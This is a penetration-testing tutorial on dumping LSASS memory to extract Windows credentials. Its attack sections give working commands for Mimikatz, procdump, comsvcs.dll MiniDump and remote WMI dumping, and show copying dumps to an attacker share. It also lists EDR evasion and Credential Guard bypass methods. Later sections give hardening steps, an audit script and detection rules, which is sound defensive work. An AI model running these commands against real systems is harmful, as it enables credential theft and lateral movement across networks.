Dumping LSASS Memory for Credential Extraction: Techniques and Tools

One of the most crucial steps in post-exploitation and privilege escalation is extracting credentials from the LSASS (Local Security Authority Subsystem Service) process on a Windows system. LSASS stores passwords, hashes, Kerberos tickets, and other sensitive data in memory.

Dumping LSASS memory is a common technique used by attackers to extract these credentials. However, modern Endpoint Detection and Response (EDR) solutions and Windows Defender actively monitor for such activities, making it essential to use advanced techniques and proper evasion methods.

1. What is LSASS?

LSASS is a process in Windows responsible for enforcing security policies and handling user authentication. The process is crucial as it stores:

  • NTLM Hashes
  • Kerberos Tickets
  • Plaintext Passwords (in some cases)
  • Cached Credentials

LSASS Process Location:

C:\Windows\System32\lsass.exe

2. Why Dump LSASS Memory?

Extracting credentials from LSASS can grant an attacker full control over the compromised system and even the entire Active Directory (AD) environment.

Common Attack Scenarios:

  • Post-Exploitation: After gaining initial access, to escalate privileges.
  • Lateral Movement: To pivot to other systems on the network.
  • Credential Dumping: To gather domain admin or local admin credentials.

3. Techniques to Dump LSASS Memory

3.1 Dumping via Mimikatz

Mimikatz is a powerful post-exploitation tool capable of extracting credentials directly from memory.

Download and Execute Mimikatz:

Invoke-WebRequest -Uri "https://example.com/mimikatz.exe" -OutFile "C:\temp\mimikatz.exe"

Dump LSASS Memory with Mimikatz:

privilege::debug
sekurlsa::logonpasswords

Dump LSASS via MiniDump:

sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

3.2 Creating an LSASS Dump with Task Manager

Step 1: Open Task Manager

  • Locate lsass.exe under Processes.
  • Right-click and choose Create Dump File.
  • The file will be saved at:

C:\Users\<Username>\AppData\Local\Temp\lsass.DMP

Step 2: Transfer the Dump File

Copy the file to your attacking machine:

copy C:\Users\<Username>\AppData\Local\Temp\lsass.DMP \\attacker\share\

Step 3: Analyze the Dump with Mimikatz

sekurlsa::minidump lsass.DMP
sekurlsa::logonpasswords

3.3 Using Procdump for LSASS Dumping

Procdump is a Microsoft Sysinternals tool for capturing process memory dumps. It is stealthier than Mimikatz because its use looks like legitimate system activity.

Step 1: Download Procdump

Invoke-WebRequest -Uri "https://download.sysinternals.com/files/Procdump.zip" -OutFile "C:\temp\Procdump.zip"

Step 2: Extract and Execute

procdump.exe -ma lsass.exe C:\temp\lsass.dmp

Step 3: Analyze the Dump with Mimikatz

sekurlsa::minidump C:\temp\lsass.dmp
sekurlsa::logonpasswords

3.4 Dumping LSASS Using comsvcs.dll

An alternative method to dump LSASS without using third-party tools:

rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump lsass.exe C:\temp\lsass.dmp full

Advantages:

  • Bypasses most EDR detections.
  • Uses native Windows DLLs.

3.5 Remote LSASS Dump via WMI and PowerShell

Remote Dump Using WMI:

Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "procdump.exe -ma lsass.exe C:\temp\lsass.dmp"

Remote File Transfer:

copy-item -path C:\temp\lsass.dmp -destination \\attacker\share\

4. Evasion Techniques and Anti-Detection

4.1 Memory Injection Techniques

  • Inject directly into trusted processes to mask malicious actions.
  • Avoid spawning suspicious child processes.

4.2 Process Hollowing

Replace the memory space of a legitimate process with a payload, making detection harder.

4.3 Bypassing Credential Guard

Credential Guard is a Windows 10/11 and Server 2016+ feature that isolates LSASS. Use:

  • Kernel Exploits: To disable Credential Guard.
  • Direct Memory Access (DMA): Via hardware devices.

5. Analyzing LSASS Dump on an Attacker Machine

Transfer the dump to your Kali Linux or Windows analysis machine.

scp user@victim:/temp/lsass.dmp /opt/lsass.dmp

5.1 Using Mimikatz on Kali

mimikatz.exe "sekurlsa::minidump /opt/lsass.dmp" "sekurlsa::logonpasswords"

5.2 Analyzing with Volatility

volatility -f /opt/lsass.dmp --profile=Win10x64_1809 hashdump

6. How to Detect and Prevent LSASS Dumping

6.1 Enabling Windows Defender and EDR

  • Monitor processes that access lsass.exe.
  • Use Advanced Threat Protection (ATP) to detect suspicious memory dumps.

6.2 Hardening LSASS Protection

Enable LSASS Protection Mode:

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "RunAsPPL" /t REG_DWORD /d "1" /f
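Setting RunAsPPL only takes effect at the next boot, so a useful audit checks both the configured value and whether lsass.exe actually started protected. The script below is an added example, not from the original article: it reads the registry value the reg add command above sets, looks for the Wininit event 12 that Windows writes at boot when LSASS starts as a protected process, and combines the two into a single verdict. The wevtutil query syntax and the meaning of value 2 (LSA protection without UEFI lock on newer Windows 11 builds) are assumptions on my part; the pure assess() function runs anywhere, while audit() needs the Windows host being checked.

```python
import subprocess
import sys

# Registry location of the LSA protection setting, as set by the page's reg add command.
LSA_KEY = r"SYSTEM\CurrentControlSet\Control\Lsa"
VALUE_NAME = "RunAsPPL"
# 1 = enabled; 2 = enabled without UEFI lock (assumed: newer Windows 11 builds).
ENABLED_VALUES = {1: "enabled", 2: "enabled without UEFI lock"}


def assess(runasppl_value, lsass_started_protected):
    """Combine the configured registry value with runtime evidence.

    The registry value is only honoured on the next boot, so RunAsPPL=1
    without a 'started as a protected process' event means the setting is
    staged but LSASS is still unprotected until the machine reboots.
    """
    configured = runasppl_value in ENABLED_VALUES
    if configured and lsass_started_protected:
        return "configured and active"
    if configured:
        return "configured, reboot required"
    if lsass_started_protected:
        # Protection was active at boot but the value is gone now: investigate who removed it.
        return "active at last boot, not configured"
    return "not configured"


def read_runasppl():
    """Read the live DWORD on Windows; None when the key or value is absent."""
    import winreg  # Windows-only module, imported lazily so assess() stays portable
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, LSA_KEY) as key:
            value, kind = winreg.QueryValueEx(key, VALUE_NAME)
    except FileNotFoundError:
        return None
    return value if kind == winreg.REG_DWORD else None


def lsass_started_protected():
    """Check the System log for Wininit event 12 ("LSASS.exe was started as a
    protected process"). The wevtutil invocation is an assumed command line."""
    query = "*[System[Provider[@Name='Microsoft-Windows-Wininit'] and EventID=12]]"
    result = subprocess.run(
        ["wevtutil", "qe", "System", f"/q:{query}", "/c:1", "/f:text", "/rd:true"],
        capture_output=True, text=True,
    )
    return "protected process" in result.stdout.lower()


def audit():
    """Print the LSA protection state of this host and return the verdict."""
    if sys.platform != "win32":
        print("run this audit on the Windows host being checked")
        return None
    value = read_runasppl()
    state = assess(value, lsass_started_protected())
    print(f"RunAsPPL={value!r}: {state}")
    if state != "configured and active":
        print(r'remediation: reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" '
              r'/v RunAsPPL /t REG_DWORD /d 1 /f, then reboot')
    return state


if __name__ == "__main__":
    audit()
```

The split between assess() and the two Windows-specific readers keeps the decision logic testable off-host; in a fleet audit you would feed assess() with values collected from each endpoint rather than calling audit() locally.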

6.3 Implementing Credential Guard

Protect LSASS with Windows Defender Credential Guard to prevent memory dumping.

7. Detection Techniques for Blue Teams

Monitor Common Indicators:

  • Event ID 4697: Service installation.
  • Event ID 7045: New service creation.
  • Event ID 4688: Process creation, especially from suspicious paths.

Use SIEM Solutions like Wazuh:

Set up alerts for unusual processes interacting with lsass.exe.
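The two detection ideas in sections 6.1 and 7, watching which processes open handles to lsass.exe and watching process creation for the dump commands shown earlier, can be expressed as a small rule set. The following is an added example, not part of the original article or any SIEM product: it evaluates constructed log lines in a simple key=value format standing in for Sysmon Event ID 10 (ProcessAccess) and Security Event ID 4688 (process creation with command-line auditing). The allowlist of system binaries and the GrantedAccess mask are assumptions to tune per environment; the access-right constants are the documented Windows process rights.

```python
import re

# Windows process access rights that, together, allow reading another process's memory.
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
PROCESS_QUERY_INFORMATION = 0x0400
MEMORY_READ_RIGHTS = (PROCESS_VM_OPERATION | PROCESS_VM_READ
                      | PROCESS_VM_WRITE | PROCESS_QUERY_INFORMATION)

# Assumed allowlist of binaries that legitimately open lsass.exe; tune per environment.
LSASS_ACCESS_ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\svchost.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}

# Command-line signatures for the dump techniques described on the page.
COMMAND_LINE_PATTERNS = [
    ("comsvcs_minidump", re.compile(r"comsvcs(\.dll)?.*minidump", re.I)),
    ("procdump_lsass", re.compile(r"procdump.*-ma.*lsass", re.I)),
    ("mimikatz_sekurlsa", re.compile(r"sekurlsa::", re.I)),
]


def parse_event(line):
    """Parse one 'Key=Value|Key=Value' log line into a dict."""
    event = {}
    for field in line.strip().split("|"):
        key, _, value = field.partition("=")
        event[key.strip()] = value.strip()
    return event


def is_lsass(path):
    return path.lower().endswith(r"\lsass.exe")


def check_process_access(event):
    """Sysmon Event ID 10: flag non-allowlisted processes opening lsass.exe with memory-read rights."""
    if event.get("EventID") != "10" or not is_lsass(event.get("TargetImage", "")):
        return None
    granted = int(event.get("GrantedAccess", "0"), 16)
    source = event.get("SourceImage", "").lower()
    if granted & MEMORY_READ_RIGHTS and source not in LSASS_ACCESS_ALLOWLIST:
        return ("lsass_memory_access",
                f"{event['SourceImage']} opened lsass.exe with 0x{granted:X}")
    return None


def check_command_line(event):
    """Security Event ID 4688: flag command lines matching known dump tooling."""
    if event.get("EventID") != "4688":
        return None
    command = event.get("CommandLine", "")
    for name, pattern in COMMAND_LINE_PATTERNS:
        if pattern.search(command):
            return (name, command)
    return None


def analyze(lines):
    """Run every check over every line; return a list of (rule, detail) alerts."""
    alerts = []
    for line in lines:
        if not line.strip():
            continue
        event = parse_event(line)
        for check in (check_process_access, check_command_line):
            hit = check(event)
            if hit:
                alerts.append(hit)
    return alerts


# Constructed sample events; only the first and last are benign.
SAMPLE_LOG = [
    r"EventID=10|SourceImage=C:\Windows\System32\svchost.exe|TargetImage=C:\Windows\System32\lsass.exe|GrantedAccess=0x1000",
    r"EventID=10|SourceImage=C:\temp\procdump.exe|TargetImage=C:\Windows\System32\lsass.exe|GrantedAccess=0x1FFFFF",
    r"EventID=10|SourceImage=C:\Windows\System32\rundll32.exe|TargetImage=C:\Windows\System32\lsass.exe|GrantedAccess=0x1410",
    r"EventID=10|SourceImage=C:\Windows\System32\taskmgr.exe|TargetImage=C:\Windows\System32\lsass.exe|GrantedAccess=0x1FFFFF",
    r"EventID=4688|NewProcessName=C:\Windows\System32\rundll32.exe|CommandLine=rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump lsass.exe C:\temp\lsass.dmp full",
    r"EventID=4688|NewProcessName=C:\Windows\System32\notepad.exe|CommandLine=notepad.exe C:\temp\notes.txt",
]

if __name__ == "__main__":
    for rule, detail in analyze(SAMPLE_LOG):
        print(f"[{rule}] {detail}")
```

Note that the first sample line is not flagged even though svchost.exe is allowlisted anyway: 0x1000 is PROCESS_QUERY_LIMITED_INFORMATION, which carries no memory-read right, so the mask alone already excludes it. Task Manager's Create Dump File and rundll32 both appear as handle opens with memory-read rights, which is why the handle-based rule catches techniques that never spawn a suspicious command line.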

Conclusion

Dumping LSASS memory is a critical post-exploitation technique used by attackers to extract sensitive credentials from compromised systems. While tools like Mimikatz and Procdump are widely known, modern defense mechanisms demand more advanced and stealthy approaches.

By combining techniques like rundll32-based dumping, memory injection, and Credential Guard bypass, penetration testers can effectively demonstrate the risk of credential leakage. However, defenders must stay vigilant and implement LSASS hardening techniques to mitigate these risks.
